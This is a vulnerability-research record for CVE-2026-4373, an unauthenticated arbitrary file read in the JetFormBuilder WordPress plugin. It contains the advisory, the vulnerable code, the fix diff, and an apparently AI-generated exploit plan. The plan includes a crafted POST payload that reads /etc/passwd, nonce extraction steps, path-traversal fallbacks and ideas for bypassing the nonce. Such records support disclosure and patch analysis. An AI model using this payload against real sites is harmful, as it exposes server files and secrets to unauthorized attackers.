[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fiExvi4WfueUpgBAflczm9zbZOJ_X21d0u6JYWZqWsBY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-4373","jetformbuilder-unauthenticated-arbitrary-file-read-via-media-field","JetFormBuilder \u003C= 3.5.6.2 - Unauthenticated Arbitrary File Read via Media Field","The JetFormBuilder plugin for WordPress is vulnerable to arbitrary file read via path traversal in all versions up to, and including, 3.5.6.2. This is due to the 'Uploaded_File::set_from_array' method accepting user-supplied file paths from the Media Field preset JSON payload without validating that the path belongs to the WordPress uploads directory. Combined with an insufficient same-file check in 'File_Tools::is_same_file' that only compares basenames, this makes it possible for unauthenticated attackers to exfiltrate arbitrary local files as email attachments by submitting a crafted form request when the form is configured with a Media Field and a Send Email action with file attachment.","jetformbuilder",null,"\u003C=3.5.6.2","3.5.6.3","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Absolute Path Traversal","2026-03-20 18:28:08","2026-03-21 06:45:14",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1801fd3e-d56f-4540-9700-9e9de8b465e1?source=api-prod",1,[22,23,24,25,26,27,28,29],"includes\u002Fblocks\u002Frender\u002Fmedia-field-render.php","includes\u002Fclasses\u002Fresources\u002Ffile-tools.php","includes\u002Fclasses\u002Fresources\u002Fuploaded-file.php","jet-form-builder.php","modules\u002Factions-v2\u002Fsend-email\u002Fsend-email-action.php","modules\u002Fform-record\u002Fadmin\u002Fmeta-boxes\u002Fform-record-values-box.php","readme.txt","vendor\u002Fcomposer\u002Finstalled.php","researched",false,3,"# Exploit Research Plan - CVE-2026-4373 (JetFormBuilder Arbitrary File Read)\n\n## 1. Vulnerability Summary\nThe **JetFormBuilder** plugin (\u003C= 3.5.6.2) is vulnerable to an unauthenticated arbitrary file read. The vulnerability exists because the plugin trusts user-supplied file paths provided in the \"Media Field\" preset data. Specifically, the `Uploaded_File::set_from_array` method populates a file object's internal path from an array without validating if that path is within the WordPress uploads directory. \n\nWhen a form is submitted with a Media Field and a \"Send Email\" action configured to include attachments, an attacker can supply a crafted JSON payload for the Media Field. This payload points the \"internal file path\" to a sensitive local file (e.g., `\u002Fetc\u002Fpasswd`). Because `File_Tools::is_same_file` only performs a weak validation (comparing the basename of a URL to the filename), an attacker can bypass security checks and force the plugin to attach arbitrary local files to the outgoing email.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (for AJAX submissions) or the permalink of a page containing a JetFormBuilder form.\n- **Action:** `jet_form_builder_submit` (AJAX action) or a direct POST request.\n- **Vulnerable Parameter:** The input field name corresponding to the **Media Field** (e.g., `my_media_field`).\n- **Payload:** A JSON-encoded array or structured POST data containing a `file` key pointing to the target absolute path and a `url` key whose basename matches the filename being \"uploaded\".\n- **Authentication:** Unauthenticated (if the form is public).\n- **Preconditions:** \n    1. A form must exist with a **Media Field**.\n    2. The form must have a **Send Email** Post-Submit Action.\n    3. The **Send Email** action must have the Media Field selected in its **Attachments** settings.\n\n## 3. Code Flow\n1. **Entry Point:** The user submits a form. JetFormBuilder processes the request via `Jet_Form_Builder\\Actions\\Action_Handler`.\n2. **Preset Processing:** During form processing, the plugin reconciles submitted files with \"presets\" (existing files).\n3. **Reconciliation:** `Jet_Form_Builder\\Classes\\Resources\\File_Tools::get_uploaded(File $file, $preset)` is called.\n    - `$file` is the object representing the file being uploaded in the current request.\n    - `$preset` is the user-controlled data provided for the field.\n4. **Weak Validation:** `File_Tools::is_same_file` is called:\n   ```php\n   protected static function is_same_file( File $file, Uploaded_File $uploaded_file ): bool {\n       $info = pathinfo( $uploaded_file->get_url() );\n       return $file->get_name() === ( $info['basename'] ?? '' );\n   }\n   ```\n   If the attacker provides a `url` like `http:\u002F\u002Flocalhost\u002Fpasswd` and uploads a file named `passwd`, this returns `true`.\n5. **Object Population (Sink):** `Uploaded_File::set_from_array(array $upload)` is called with the attacker's data:\n   ```php\n   public function set_from_array( array $upload ): Uploaded_File {\n       if ( isset( $upload['file'] ) ) {\n           $this->file = $upload['file']; \u002F\u002F Path injection: \u002Fetc\u002Fpasswd\n       }\n       ...\n   }\n   ```\n6. **Action Execution:** The `Send_Email_Action::do_action` method executes.\n7. **Exfiltration:** It calls `get_attachments()`, which eventually calls `Uploaded_File::get_attachment_file()`. This returns the injected `\u002Fetc\u002Fpasswd` path.\n8. **Sink:** `wp_mail()` is called with the local path in the `$attachments` array, causing WordPress to read the file and attach it to the email.\n\n## 4. Nonce Acquisition Strategy\nJetFormBuilder requires a nonce for form submission.\n\n1. **Identify Variable:** The plugin typically localizes form settings in a global JavaScript object named `JetFormBuilderSettings`.\n2. **Trigger Script Loading:** The script and nonce are only loaded on pages containing a `jet-form-builder` block.\n3. **Execution Steps:**\n    - Create a test page containing the target form: `wp post create --post_type=page --post_status=publish --post_content='[jet_form_builder id=\"ID_HERE\"]'`\n    - Navigate to this page using `browser_navigate`.\n    - Extract the nonce: `browser_eval(\"JetFormBuilderSettings.nonce\")`.\n    - Extract the Form ID if not known: `browser_eval(\"document.querySelector('input[name=\\\"_jfb_form_id\\\"]').value\")`.\n\n## 5. Exploitation Strategy\n### Step 1: Create a Form\nCreate a form with a Media Field and Send Email action using WP-CLI.\n\n### Step 2: Prepare Payload\nThe POST request must include:\n- `_jfb_form_id`: The ID of the form.\n- `_jfb_nonce`: The extracted nonce.\n- `field_name`: A JSON-encoded array containing the malicious file path.\n- `$_FILES['field_name']`: A dummy file with a matching name.\n\n### Step 3: Execute Request\nSend a multipart\u002Fform-data request to `admin-ajax.php`.\n\n**Payload Example (POST Body):**\n```text\naction: jet_form_builder_submit\n_jfb_form_id: 123\n_jfb_nonce: [nonce]\nmy_media_field: [{\"url\":\"http:\u002F\u002Flocalhost\u002Fpasswd\", \"file\":\"\u002Fetc\u002Fpasswd\"}]\n```\n**Files:**\n`my_media_field` -> file content: \"dummy\", filename: \"passwd\"\n\n## 6. Test Data Setup\n1. **Create the Form:**\n   ```bash\n   # Create a Form Post\n   FORM_ID=$(wp post create --post_type=jet-form-builder --post_title=\"Exploit Form\" --post_status=publish --porcelain)\n   \n   # Add Media Field and Email Action to the form content\u002Fmeta\n   # Note: JetFormBuilder stores actions in _jet_at_post_submit_actions meta\n   wp post meta update $FORM_ID _jet_at_post_submit_actions '[{\"id\":\"send_email\",\"settings\":{\"mail_to\":\"admin@example.com\",\"subject\":\"Exfiltrated\",\"attachments\":[\"my_media_field\"]}}]'\n   \n   # Set the form content (Media Field)\n   wp post update $FORM_ID --post_content='\u003C!-- wp:jet-form-builder\u002Fmedia-field {\"name\":\"my_media_field\",\"label\":\"Upload\"} \u002F-->\u003C!-- wp:jet-form-builder\u002Fsubmit-field {\"label\":\"Submit\"} \u002F-->'\n   ```\n2. **Create a Page:**\n   ```bash\n   PAGE_ID=$(wp post create --post_type=page --post_title=\"Submit Here\" --post_content=\"[jet_form_builder id=\\\"$FORM_ID\\\"]\" --post_status=publish --porcelain)\n   ```\n\n## 7. Expected Results\n- The HTTP response should indicate a successful submission (`{\"status\":\"success\"}`).\n- Internally, `wp_mail` will be called with `\u002Fetc\u002Fpasswd` as an attachment. \n- Since we cannot receive the email in a headless environment, we look for confirmation that the action was triggered with the malicious path.\n\n## 8. Verification Steps\n1. **Check Form Records:** If \"Store Form Record\" is enabled, verify the recorded path.\n   ```bash\n   wp jet-form-builder record list --fields=id,form_id\n   # Inspect the meta for the record to see if \u002Fetc\u002Fpasswd was processed\n   ```\n2. **Mock\u002FLog `wp_mail`:** Use a plugin like `WP Mail Logging` or use `wp eval` to check if any errors occurred during the email process that might reveal the attachment attempt.\n3. **Database Check:** If the form is configured to save metadata, check the `wp_postmeta` for the form record's ID to see if the `my_media_field` value contains `\u002Fetc\u002Fpasswd`.\n\n## 9. Alternative Approaches\n- **Path Traversal via URL:** If `\u002Fetc\u002Fpasswd` is blocked, try `..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd` in the `file` parameter.\n- **Different Actions:** If \"Send Email\" is not present, check if \"Insert\u002FUpdate Post\" allows mapping the Media Field to a post meta field, which would then be readable via the REST API or frontend.\n- **Bypass Nonce:** Check if the nonce validation is omitted if the request is sent with a specific header or to a different endpoint (e.g., REST API). (Based on `Send_Email_Action::self_script_name`, the plugin might have specific handlers for different modules).","The JetFormBuilder plugin for WordPress is vulnerable to unauthenticated arbitrary file read due to improper path validation in the Media Field processing logic. An attacker can supply an absolute local file path in a crafted JSON payload, which the plugin subsequently uses as an email attachment if the 'Send Email' post-submit action is configured.","\u002F\u002F includes\u002Fclasses\u002Fresources\u002Fuploaded-file.php\n\npublic function set_from_array( array $upload ): Uploaded_File {\n\tif ( isset( $upload['file'] ) ) {\n\t\t$this->file = $upload['file'];\n\t}\n\tif ( isset( $upload['url'] ) ) {\n\t\t$this->url = $upload['url'];\n\t}\n\n---\n\n\u002F\u002F includes\u002Fclasses\u002Fresources\u002Ffile-tools.php\n\nprotected static function is_same_file( File $file, Uploaded_File $uploaded_file ): bool {\n\t$info = pathinfo( $uploaded_file->get_url() );\n\n\treturn $file->get_name() === ( $info['basename'] ?? '' );\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fincludes\u002Fblocks\u002Frender\u002Fmedia-field-render.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fincludes\u002Fblocks\u002Frender\u002Fmedia-field-render.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fincludes\u002Fblocks\u002Frender\u002Fmedia-field-render.php\t2025-07-02 07:54:48.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fincludes\u002Fblocks\u002Frender\u002Fmedia-field-render.php\t2026-03-20 07:01:12.000000000 +0000\n@@ -75,7 +75,7 @@\n \t\t\t\u002F\u002F preset field\n \t\t\t$updated = str_replace( '\u003C!-- field -->', $this->get_field_preset( $file ), $updated );\n \n-\t\t\t$image_ext    = array( 'jpg', 'jpeg', 'jpe', 'gif', 'png', 'svg', 'webp' );\n+\t\t\t$image_ext    = array( 'jpg', 'jpeg', 'jpe', 'gif', 'png', 'svg', 'webp', 'avif' );\n \t\t\t$img_ext_preg = '!.(' . join( '|', $image_ext ) . ')$!i';\n \n \t\t\tif ( preg_match( $img_ext_preg, $file['url'] ) ) {\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fincludes\u002Fclasses\u002Fresources\u002Ffile-tools.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fincludes\u002Fclasses\u002Fresources\u002Ffile-tools.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fincludes\u002Fclasses\u002Fresources\u002Ffile-tools.php\t2023-11-20 11:46:54.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fincludes\u002Fclasses\u002Fresources\u002Ffile-tools.php\t2026-03-20 07:01:12.000000000 +0000\n@@ -30,7 +30,13 @@\n \t}\n \n \tprotected static function is_same_file( File $file, Uploaded_File $uploaded_file ): bool {\n-\t\t$info = pathinfo( $uploaded_file->get_url() );\n+\t\t$preset_path = $uploaded_file->get_attachment_file();\n+\n+\t\tif ( ! $preset_path ) {\n+\t\t\treturn false;\n+\t\t}\n+\n+\t\t$info = pathinfo( $preset_path );\n \n \t\treturn $file->get_name() === ( $info['basename'] ?? '' );\n \t}\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fincludes\u002Fclasses\u002Fresources\u002Fuploaded-file.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fincludes\u002Fclasses\u002Fresources\u002Fuploaded-file.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fincludes\u002Fclasses\u002Fresources\u002Fuploaded-file.php\t2025-07-02 07:54:48.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fincludes\u002Fclasses\u002Fresources\u002Fuploaded-file.php\t2026-03-20 07:01:12.000000000 +0000\n@@ -96,17 +96,17 @@\n \n \tpublic function set_from_array( array $upload ): Uploaded_File {\n \t\tif ( isset( $upload['file'] ) ) {\n-\t\t\t$this->file = $upload['file'];\n+\t\t\t$this->file = self::normalize_allowed_upload_file_path( (string) $upload['file'] );\n \t\t}\n \t\tif ( isset( $upload['url'] ) ) {\n-\t\t\t$this->url = $upload['url'];\n+\t\t\t$this->url = esc_url_raw( (string) $upload['url'] );\n \t\t}\n \t\tif ( isset( $upload['type'] ) ) {\n-\t\t\t$this->type = $upload['type'];\n+\t\t\t$this->type = sanitize_mime_type( (string) $upload['type'] );\n \t\t}\n \t\tif ( isset( $upload['id'] ) ) {\n \n-\t\t\t$this->set_attachment_id( (string) $upload['id'] );\n+\t\t\t$this->set_attachment_id( (string) absint( $upload['id'] ) );\n \t\t}\n \n \t\treturn $this;\n@@ -185,7 +185,10 @@\n \t\t$file = $this->get_file();\n \n \t\tif ( $file ) {\n-\t\t\treturn $file;\n+\t\t\t$file = self::normalize_allowed_upload_file_path( $file );\n+\t\t\tif ( $file ) {\n+\t\t\t\treturn $file;\n+\t\t\t}\n \t\t}\n \n \t\t$id  = $this->get_attachment_id();\n@@ -197,13 +200,59 @@\n \n \t\t$file = get_attached_file( $id );\n \n-\t\treturn is_string( $file ) ? $file : '';\n+\t\tif ( ! is_string( $file ) ) {\n+\t\t\treturn '';\n+\t\t}\n+\n+\t\treturn self::normalize_allowed_upload_file_path( $file );\n \t}\n \n \t\u002F**\n \t * @param string $url\n \t *\u002F\n \tpublic function set_url( string $url ) {\n-\t\t$this->url = $url;\n+\t\t$this->url = esc_url_raw( $url );\n+\t}\n+\n+\t\u002F**\n+\t * Normalize path and allow only existing files inside wp-content uploads directory.\n+\t *\n+\t * @return string Normalized realpath to a file in uploads, or empty string.\n+\t *\u002F\n+\tpublic static function normalize_allowed_upload_file_path( string $file ): string {\n+\t\tif ( '' === $file ) {\n+\t\t\treturn '';\n+\t\t}\n+\n+\t\t$path = wp_normalize_path( $file );\n+\t\t$real = realpath( $path );\n+\n+\t\tif ( false === $real ) {\n+\t\t\treturn '';\n+\t\t}\n+\n+\t\t$real = wp_normalize_path( $real );\n+\t\t$real = untrailingslashit( $real );\n+\n+\t\t$uploads = wp_get_upload_dir();\n+\t\t$base    = (string) ( $uploads['basedir'] ?? '' );\n+\n+\t\tif ( '' === $base ) {\n+\t\t\treturn '';\n+\t\t}\n+\n+\t\t$base_real = realpath( $base );\n+\t\tif ( false === $base_real ) {\n+\t\t\treturn '';\n+\t\t}\n+\n+\t\t$base = wp_normalize_path( $base_real );\n+\t\t$base = untrailingslashit( $base );\n+\n+\t\tif ( 0 === strpos( $real, $base . '\u002F' ) && is_file( $real ) ) {\n+\t\t\treturn $real;\n+\t\t}\n+\n+\t\treturn '';\n \t}\n }\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fmodules\u002Factions-v2\u002Fsend-email\u002Fsend-email-action.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fmodules\u002Factions-v2\u002Fsend-email\u002Fsend-email-action.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.2\u002Fmodules\u002Factions-v2\u002Fsend-email\u002Fsend-email-action.php\t2024-12-18 13:19:08.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjetformbuilder\u002F3.5.6.3\u002Fmodules\u002Factions-v2\u002Fsend-email\u002Fsend-email-action.php\t2026-03-20 07:01:12.000000000 +0000\n@@ -5,6 +5,7 @@\n use Jet_Form_Builder\\Actions\\Action_Handler;\n use Jet_Form_Builder\\Actions\\Types\\Base;\n use Jet_Form_Builder\\Classes\\Http\\Http_Tools;\n+use Jet_Form_Builder\\Classes\\Resources\\Uploaded_File;\n use Jet_Form_Builder\\Classes\\Tools;\n use Jet_Form_Builder\\Exceptions\\Action_Exception;\n use Jet_Form_Builder\\Request\\Request_Tools;\n@@ -397,7 +398,29 @@\n \t\t\t);\n \t\t}\n \n-\t\treturn $attachments;\n+\t\treturn $this->filter_safe_attachments( $attachments );\n+\t}\n+\n+\t\u002F**\n+\t * Allow only readable files within the uploads directory.\n+\t *\u002F\n+\tprivate function filter_safe_attachments( array $attachments ): array {\n+\t\t$safe = array();\n+\n+\t\tforeach ( $attachments as $attachment ) {\n+\t\t\tif ( ! is_string( $attachment ) || '' === $attachment ) {\n+\t\t\t\tcontinue;\n+\t\t\t}\n+\n+\t\t\t$allowed = Uploaded_File::normalize_allowed_upload_file_path( $attachment );\n+\t\t\tif ( '' === $allowed || ! is_file( $allowed ) || ! is_readable( $allowed ) ) {\n+\t\t\t\tcontinue;\n+\t\t\t}\n+\n+\t\t\t$safe[] = $allowed;\n+\t\t}\n+\n+\t\treturn array_values( array_unique( $safe ) );\n \t}","To exploit this vulnerability, an attacker first identifies a JetFormBuilder form on the target site that uses a Media Field and has a 'Send Email' post-submit action configured to include that field as an attachment. The attacker obtains the necessary submission nonce from the page's source code. They then perform a multipart POST request to the `jet_form_builder_submit` action, including a crafted JSON payload in the Media Field's input name. This payload contains a `file` key pointing to a sensitive absolute path (e.g., `\u002Fetc\u002Fpasswd`) and a `url` key with a matching basename to bypass the plugin's internal consistency checks. Upon submission, the plugin validates the dummy file provided in the upload request against the preset JSON data, assigns the malicious absolute path to the file object, and subsequently attaches that file to the email sent by the 'Send Email' action.","gemini-3-flash-preview","2026-04-18 00:34:14","2026-04-18 00:34:51",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.5.6.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjetformbuilder\u002Ftags\u002F3.5.6.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fjetformbuilder.3.5.6.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjetformbuilder\u002Ftags\u002F3.5.6.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fjetformbuilder.3.5.6.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjetformbuilder\u002Ftags"]